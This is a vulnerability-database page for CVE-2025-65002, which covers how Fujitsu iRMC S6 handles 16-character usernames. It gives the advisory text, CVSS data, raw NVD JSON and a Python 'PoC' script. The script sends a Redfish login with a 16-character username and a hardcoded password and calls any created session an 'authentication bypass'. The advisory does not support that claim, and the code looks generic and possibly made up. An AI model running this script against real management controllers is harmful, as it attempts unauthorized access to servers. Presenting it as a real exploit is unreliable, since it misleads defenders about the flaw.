Security Vulnerability Report
中文
CVE-2025-65002 CVSS 7.5 HIGH

CVE-2025-65002

Published: 2025-11-12 18:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Fujitsu / Fsas Technologies iRMC S6 on M5 before 1.37S mishandles Redfish/WebUI access if the length of a username is exactly 16 characters.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Fujitsu iRMC S6 (M5) < 1.37S

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-65002 PoC Fujitsu iRMC S6 16-character username authentication bypass Note: This PoC is for educational and authorized testing purposes only. """ import requests import string import random TARGET_HOST = "https://target-irmc-server.local" USERNAME_16CHARS = "a" * 16 # 16-character username to trigger vulnerability PASSWORD = "password123" def create_16char_username(): """Generate a 16-character username""" chars = string.ascii_letters + string.digits return ''.join(random.choice(chars) for _ in range(16)) def test_authentication_bypass(): """Test Redfish API authentication with 16-char username""" session = requests.Session() # Redfish API authentication endpoint auth_url = f"{TARGET_HOST}/redfish/v1/SessionService/Sessions" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-65002-PoC)" } # Payload with 16-character username payload = { "UserName": USERNAME_16CHARS, "Password": PASSWORD } try: response = session.post(auth_url, json=payload, headers=headers, verify=False, timeout=10) print(f"[*] Target: {TARGET_HOST}") print(f"[*] Username length: {len(USERNAME_16CHARS)} characters") print(f"[*] Response Status: {response.status_code}") if response.status_code == 200 or response.status_code == 201: # Check for session token in response if 'X-Auth-Token' in response.headers or 'Location' in response.headers: print("[+] Potential authentication bypass detected!") print(f"[+] Session created with 16-char username") return True print("[-] Authentication bypass not confirmed") return False except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-65002 Authentication Bypass PoC") print("Fujitsu iRMC S6 - 16 Character Username Handling Issue") print("=" * 60) test_authentication_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65002", "sourceIdentifier": "[email protected]", "published": "2025-11-12T18:15:36.297", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fujitsu / Fsas Technologies iRMC S6 on M5 before 1.37S mishandles Redfish/WebUI access if the length of a username is exactly 16 characters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://security.ts.fujitsu.com/ProductSecurity/content/FsasTech-PSIRT-FTI-ISS-2025-082610-Security-Notice.pdf", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.